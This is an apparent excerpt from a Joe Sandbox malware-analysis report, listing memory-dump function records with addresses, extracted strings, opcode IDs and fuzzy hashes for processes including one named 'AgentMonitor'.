                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction ID: cd4aa9e172ae52fac8fc738878e09c470a92b46a88d531ec72c27a7fd50ee2fe
                                      • Opcode Fuzzy Hash: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction Fuzzy Hash: 3FC08C84F4F51B02B5003E3EDA020BFA188CFC4220FF000F2F70C41081BC0D20C5014A
                                      Function 00007FFB4ADF12B8 Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction ID: 1f5655556919453b4509072402e376b46b076b761b3ce7a8874f2fb06336f135
                                      • Opcode Fuzzy Hash: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction Fuzzy Hash: 72C04C745558098FC948FF39C98591477A0FB1D215BD500D0E409CB271E659DCD5C741
                                      Function 00007FFB4ADF36E2 Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c9e5d40a557d3e7cab0f8f8ee509a6839180c55709900b5ab003830d5080fa71
                                      • Instruction ID: aceffb09fffd6a3a666ec1794aa111dfedd5a3ed8cffca670f043e517cdc9780
                                      • Opcode Fuzzy Hash: c9e5d40a557d3e7cab0f8f8ee509a6839180c55709900b5ab003830d5080fa71
                                      • Instruction Fuzzy Hash: 49C08C80F0DC1652F26B3628D5221BE04538F44702F900074F42ED22CECE0D1A226282
                                      Function 00007FFB4ADF06D0 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction ID: b14d3cb641252aa76f0e9a1d8acfffcaa78df1867b04aa080a2de19c63929620
                                      • Opcode Fuzzy Hash: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction Fuzzy Hash: B9B01244D9E40F00B4047D7A4A4207670D8DF44100FF400F0F80C40085B84D14940242
                                      Function 00007FFB4ADF1958 Relevance: .0, Instructions: 2COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction ID: e0ba0a2d637584aee3ae4320ae925b7f1684e276ea076787f69f6cb77433a2cd
                                      • Opcode Fuzzy Hash: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction Fuzzy Hash:

                                      Non-executed Functions

                                      Function 00007FFB4ADF09B0 Relevance: 5.2, Strings: 4, Instructions: 193COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.1885985359.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_7ffb4adf0000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: a1c9df47f10177e3d473d83243ef1823d7839afeaac2732c14ceab5ccfbfe305
                                      • Instruction ID: a9acfeb0c74effa648b3d3d41f3c204ccb8985ca5deb794de0584dd5e6840b80
                                      • Opcode Fuzzy Hash: a1c9df47f10177e3d473d83243ef1823d7839afeaac2732c14ceab5ccfbfe305
                                      • Instruction Fuzzy Hash: 2C5196D7A0E22299E11236FDF4414ED2B4CCF85234708C6F7EE4D990878E4861BB92F5

                                      Executed Functions

                                      Function 00007FFB4AE20D48 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5Y_H
                                      • API String ID: 0-3237497481
                                      • Opcode ID: ed1deb6bd56861c4d256f53bb06722f308a906bc7b1cbef1c6faad31f4a03800
                                      • Instruction ID: d0bf4167ec8a03dc5e8f1ee1a7c861ce4d163420650c33fb906c92f2aeb2b891
                                      • Opcode Fuzzy Hash: ed1deb6bd56861c4d256f53bb06722f308a906bc7b1cbef1c6faad31f4a03800
                                      • Instruction Fuzzy Hash: D291F3F6A1CA8D8FE789EF68C8657A97FE1FB59301F1002BAC049D72D6CA781815C711
                                      Function 00007FFB4AE51125 Relevance: .5, Instructions: 453COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8b41891dcccb504f5c8c1372ce36768b02caf9fb7a9170b6b4003056da6dcee4
                                      • Instruction ID: 6b34ba0406f5195af14e3b429a37231c013d8fda11f84d75396250d198869d6f
                                      • Opcode Fuzzy Hash: 8b41891dcccb504f5c8c1372ce36768b02caf9fb7a9170b6b4003056da6dcee4
                                      • Instruction Fuzzy Hash: F6C1AB61A9D6560BE31D7D789E420B577D6FBD2209B3886FDD4EBC708BD91CE4038281
                                      Function 00007FFB4AE31142 Relevance: 9.7, Strings: 7, Instructions: 990COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae30000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: HKJ$HVJ$X_J$`[J$hIJ$hxJ$pJ
                                      • API String ID: 0-2008210366
                                      • Opcode ID: f30c888f2852f353d713ac27df0412cd97662d874150f4c7ba80b641a68dba50
                                      • Instruction ID: aa1f7b8dbe6476bac08d586ff661b4ae44c8683066d4b29d2b141059bba3439a
                                      • Opcode Fuzzy Hash: f30c888f2852f353d713ac27df0412cd97662d874150f4c7ba80b641a68dba50
                                      • Instruction Fuzzy Hash: 5962C4B1A1DA5A4FEB99FF28C5916B87795FF98300F2441F9D41DC3286CD38AC868781
                                      Function 00007FFB4AE53515 Relevance: 1.5, Strings: 1, Instructions: 298COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: I_H
                                      • API String ID: 0-288374528
                                      • Opcode ID: 1ac65d01e823924655e3e4d2a7ce640cf8652b5e33cc11bd904e14067b906b78
                                      • Instruction ID: e0fcf86e76532c175eb9f57ce1e57a1ee74df64fa0f070462ee1b6a1ed55455e
                                      • Opcode Fuzzy Hash: 1ac65d01e823924655e3e4d2a7ce640cf8652b5e33cc11bd904e14067b906b78
                                      • Instruction Fuzzy Hash: 8391F4A1E1CA8A4FE789FEB8D5662B976C5FFA4300F6441F9D40EC328BDD2C68454381
                                      Function 00007FFB4AE208D0 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: eff85e68889c8ff089c83326a8815287c02a2b2a8c29d9a79bb36bb0e0a43217
                                      • Instruction ID: ae98eb3fee223a9fd4ed471aa33af3ad85c4157a2d27c87c957762e08d516c5e
                                      • Opcode Fuzzy Hash: eff85e68889c8ff089c83326a8815287c02a2b2a8c29d9a79bb36bb0e0a43217
                                      • Instruction Fuzzy Hash: 36415EA3A4E6554EE705BFB8E0AA1FD7784DF49321B2441FFD84EC71D3CD0868528291
                                      Function 00007FFB4AE20960 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: 999cbbddc0337395e17ca75d80819563223c15651b6075c15a82939996e892d6
                                      • Instruction ID: 0e277c8d0109428f6c1ca15a22c892aff0fdb190bcd13e83617a9a23784dc184
                                      • Opcode Fuzzy Hash: 999cbbddc0337395e17ca75d80819563223c15651b6075c15a82939996e892d6
                                      • Instruction Fuzzy Hash: E6314CA2A0E6551FF359BE78E45B1F977C5EF48321B6440FED80EC71D3CD1868428291
                                      Function 00007FFB4AE20998 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: e79f37bbbd280149f1b72728db58d92a4f13cd9a059f3a933acbed3e3f0562ad
                                      • Instruction ID: 5a4b6e73d464d0d77da043d9d691aa6ccdcdaf0aad46101a2fae6bd8b02fd538
                                      • Opcode Fuzzy Hash: e79f37bbbd280149f1b72728db58d92a4f13cd9a059f3a933acbed3e3f0562ad
                                      • Instruction Fuzzy Hash: 2E31E7A1B1D9591FE748FE78C46A6B977C6EF98311B6400FDD40EC3297CD18A8418252
                                      Function 00007FFB4AE33B39 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae30000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: f447b5f6be7108981dcf57ed65a4e17b37d2ad1c568a319bc78008cab43863ee
                                      • Instruction ID: 5d0455bc40b31fc99aa1f7c4caef0c640e0f592308ab85fe4cc464b112b5bbbb
                                      • Opcode Fuzzy Hash: f447b5f6be7108981dcf57ed65a4e17b37d2ad1c568a319bc78008cab43863ee
                                      • Instruction Fuzzy Hash: 16E0656194E7C14FDB15BA7484584547FA0EF6720174941EEC055CF1A7EA1D8C85C741
                                      Function 00007FFB4AE53049 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: 14153efed70dd28a805795e6bff54baf58daf10827f0b4b1b8fb5f54fc4f02d6
                                      • Instruction ID: 5e3c0f0497d03d52f8b2b0748789a65dda9fde6500e37d703f8a0e344aa2cb34
                                      • Opcode Fuzzy Hash: 14153efed70dd28a805795e6bff54baf58daf10827f0b4b1b8fb5f54fc4f02d6
                                      • Instruction Fuzzy Hash: E6F0ED6060E7C44FC71AAA748829844BFA0EF6720078A42EEC045CF1A3EA2D8888CB01
                                      Function 00007FFB4AE51D69 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: ccd04fe754404b2b91b4aff906603ca7a5d9bace99ec82a4fa7927ecf3fcb142
                                      • Instruction ID: 7d36ad143bd67cd07df1a1abceddb1dc08946a15de45a4f4d80cf2ffb1e0be4f
                                      • Opcode Fuzzy Hash: ccd04fe754404b2b91b4aff906603ca7a5d9bace99ec82a4fa7927ecf3fcb142
                                      • Instruction Fuzzy Hash: F7F0656154E7D04FCB16AA7488645557F60EF6720174A41EEC056CF1A7DA1DCC45C741
                                      Function 00007FFB4AE57FF9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: I
                                      • API String ID: 0-3707901625
                                      • Opcode ID: fffe64fbddb8a0effc8d82065bdb9b19303d941b4bb77747f1518897eb08b126
                                      • Instruction ID: a089bb71bf47d4dac48c9a44883c0c6efd8b24c0732cff56bfcd96c147cbd1a1
                                      • Opcode Fuzzy Hash: fffe64fbddb8a0effc8d82065bdb9b19303d941b4bb77747f1518897eb08b126
                                      • Instruction Fuzzy Hash: 0BE0E5A154E7C04FCB0AAA7488658443FA0AE6B21179A44EAC085CF1A7E6298949C711
                                      Function 00007FFB4AE51DF9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: I
                                      • API String ID: 0-3707901625
                                      • Opcode ID: 2452797d777f91aa7da506ba309424270f44d3c7654330ed44e3b8e4fbed4d81
                                      • Instruction ID: 8e271a8031d4b9457e8a7bcb54959b6c799bf96c6a49223af653fd3bb63d45aa
                                      • Opcode Fuzzy Hash: 2452797d777f91aa7da506ba309424270f44d3c7654330ed44e3b8e4fbed4d81
                                      • Instruction Fuzzy Hash: 0EE01AA154E7D04FCB1AAA7588659553FA0EE6B21178A40EEC046CF1A7E62DC84AC741
                                      Function 00007FFB4AE5A879 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: I
                                      • API String ID: 0-3707901625
                                      • Opcode ID: 2bfe7f33c3137b0d4e08e185de319b8cad0e077f6007561699a7374dcd4f378e
                                      • Instruction ID: bee4ba7df5126601269f2526e02e5c9171bdd37cb6250e018eeb3b654f4bf8ba
                                      • Opcode Fuzzy Hash: 2bfe7f33c3137b0d4e08e185de319b8cad0e077f6007561699a7374dcd4f378e
                                      • Instruction Fuzzy Hash: 40E01A7254F7C44FCB1AEB7488699547FA0AE6731178A44EEC045CF1B3EA2D8849C701
                                      Function 00007FFB4AE57F98 Relevance: .3, Instructions: 286COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fb09b0a4f84b5bb8d02b7a193c950ded1bb7e9cfb49e1c40ff93c2bbe65456af
                                      • Instruction ID: de6ae711f650c5e2f5ffc7759da86a18ec846f763dd7bc62acd42aa8747f9c1f
                                      • Opcode Fuzzy Hash: fb09b0a4f84b5bb8d02b7a193c950ded1bb7e9cfb49e1c40ff93c2bbe65456af
                                      • Instruction Fuzzy Hash: 6771CA92B5DE0A4FE7DDFE6CA4956B523C5FBB825172402BAD41DC328EED18DC068380
                                      Function 00007FFB4AE20908 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 335d98c78140ecc7cd7e3cce921f4542a24ea469f9cd91377458518bb7704248
                                      • Instruction ID: 1a1b587f2a4545da66be29f6463e72c757298c26b9eeeac8d926ec8a72eb6dc7
                                      • Opcode Fuzzy Hash: 335d98c78140ecc7cd7e3cce921f4542a24ea469f9cd91377458518bb7704248
                                      • Instruction Fuzzy Hash: 5521B63130C8184FE768FE1CE889EB973D5FB5932171501BAE59AC7266D911EC8287C6
                                      Function 00007FFB4AE2116D Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 69bf8d483d1eedd6b04a5bbb1ebeb1144e78b1386fdc30b7c7f69849beca8f91
                                      • Instruction ID: 6710f268222f4907456f5d4a7045998dde4c1feecd771afb1717fec95395cb12
                                      • Opcode Fuzzy Hash: 69bf8d483d1eedd6b04a5bbb1ebeb1144e78b1386fdc30b7c7f69849beca8f91
                                      • Instruction Fuzzy Hash: 9231E27190D64A8FDB45FFB8C8649A97BF0FF59310B2406FAC01AC7292DB39A941CB41
                                      Function 00007FFB4AE20C25 Relevance: .1, Instructions: 69COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 88cb800846ec3900dc11293e939e311a623dde0d7603f77858b7ca0fa9f16f38
                                      • Instruction ID: fec3d319ae0d3122325ce580701d00db14a63b05db0bf6b4995377ea204953c0
                                      • Opcode Fuzzy Hash: 88cb800846ec3900dc11293e939e311a623dde0d7603f77858b7ca0fa9f16f38
                                      • Instruction Fuzzy Hash: D621B0B2A4C6898FE712BF78C9511AC7FA4EF86320F3546F6C0519B1D2D638194A8782
                                      Function 00007FFB4AE20C38 Relevance: .1, Instructions: 54COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 92da44e5867afe204288e1661e8950873d28fb809c2dc26cd7215ac523057744
                                      • Instruction ID: bbe5a9e66dbb1a6b5f37820e1b46ebbee12c78db918ccd81b493d5f5af0ee5fb
                                      • Opcode Fuzzy Hash: 92da44e5867afe204288e1661e8950873d28fb809c2dc26cd7215ac523057744
                                      • Instruction Fuzzy Hash: 4B119EB2A4D78C8FE702FF78C9511A87FA0EB86310F2546F6C091DB292D5381A0A8781
                                      Function 00007FFB4AE524E6 Relevance: .1, Instructions: 52COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0276da0a186b192ba254a92478d67101c51905b568641c3c20f2cad35f973983
                                      • Instruction ID: 9363a2485bb7b38841d2e3c44e481c7ec80a74a77fce869095da4b3507ac0022
                                      • Opcode Fuzzy Hash: 0276da0a186b192ba254a92478d67101c51905b568641c3c20f2cad35f973983
                                      • Instruction Fuzzy Hash: BF010872E0C9198FE794FE98D8642E87391FB94310F2501F9C45DCB3CADD2868444782
                                      Function 00007FFB4AE20C40 Relevance: .0, Instructions: 48COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: facff69970792117b5e8838699b8a891f460b66b537bc57c1a10c5bbee64c023
                                      • Instruction ID: ca1b073063040ead81b28ade5c3dc9e560dbe79d12f06f2f61927f5c68828525
                                      • Opcode Fuzzy Hash: facff69970792117b5e8838699b8a891f460b66b537bc57c1a10c5bbee64c023
                                      • Instruction Fuzzy Hash: 6001ADB2A0D7888FE702EF78C5511ED7FB0EF86310F2546F6C491DB292D6381A498B81
                                      Function 00007FFB4AE5D4FC Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE51000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae51000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aff170d03d977e92eda432c4a80eb48889e176fb204e4e0ef542f9a9c8c0629e
                                      • Instruction ID: a196aba6342a2644f88cc16f466024ec2b9d2ac5c6f8dc7d73389c1c64939761
                                      • Opcode Fuzzy Hash: aff170d03d977e92eda432c4a80eb48889e176fb204e4e0ef542f9a9c8c0629e
                                      • Instruction Fuzzy Hash: BE01BCB1F084198BEB54FEA8E9853FD33E6FBD4315F3440B1C05A9618CCA39E9428B51
                                      Function 00007FFB4AE35600 Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae30000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 84945d2443365aee31829881085ef2b0fb648f710aae541353f29b6694f1ca53
                                      • Instruction ID: 974ca60f74829f3da8558d0f2238683b88473c4ed0b28d77a7db3471b2b025c8
                                      • Opcode Fuzzy Hash: 84945d2443365aee31829881085ef2b0fb648f710aae541353f29b6694f1ca53
                                      • Instruction Fuzzy Hash: B5F09E3271DA1A4BD70DBB3CD8950F4B388FF9622938C43B6C54ACA287DD14988B8790
                                      Function 00007FFB4AE20C48 Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae20000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6fd05c6b80d4689bebd0046f6aa1dd098e9a7d04ab366066c832e73273129b18
                                      • Instruction ID: 83fa4816b3ef1b3022f42506fdfc5088d9eee5659873ddb1383be4f5350322c0
                                      • Opcode Fuzzy Hash: 6fd05c6b80d4689bebd0046f6aa1dd098e9a7d04ab366066c832e73273129b18
                                      • Instruction Fuzzy Hash: 66019EB290D3888FE702EF78C55119D7FB0EF86310F2441E6C451DB292D6385A498781
                                      Function 00007FFB4AE340A6 Relevance: .0, Instructions: 38COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae30000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b096749bd7c50f4358d83f2da69bcaf38251ffe82947f7db7bb5fd35cf5114bc
                                      • Instruction ID: 93ffbb7dfe16cf43c92c6e1418f2fdb0c75df619a9bbd43080bc090905be402f
                                      • Opcode Fuzzy Hash: b096749bd7c50f4358d83f2da69bcaf38251ffe82947f7db7bb5fd35cf5114bc
                                      • Instruction Fuzzy Hash: F7014FB4A0C61F8AEB54FF68C8586FD77A5FF50311F204276C42A97295CF7859058780
                                      Function 00007FFB4AE34081 Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000025.00000002.1979915509.00007FFB4AE30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_37_2_7ffb4ae30000_AgentMonitor.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 118312cf44e5fa03d739fc0afd2fed0c96af045000d9e78bc097925d9e2fd6bb
                                      • Instruction ID: bf2971720fbe00a8be3d197effb2c2697ac53755b80076b6853b23ae97804b2b
                                      • Opcode Fuzzy Hash: 118312cf44e5fa03d739fc0afd2fed0c96af045000d9e78bc097925d9e2fd6bb
                                      • Instruction Fuzzy Hash: 660171B0A1861B8BEB15FE54C8145FE76B5FF40301F204276D42A972C9CF7469018780
                                      Function 00007FFB4AE35DB5 Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
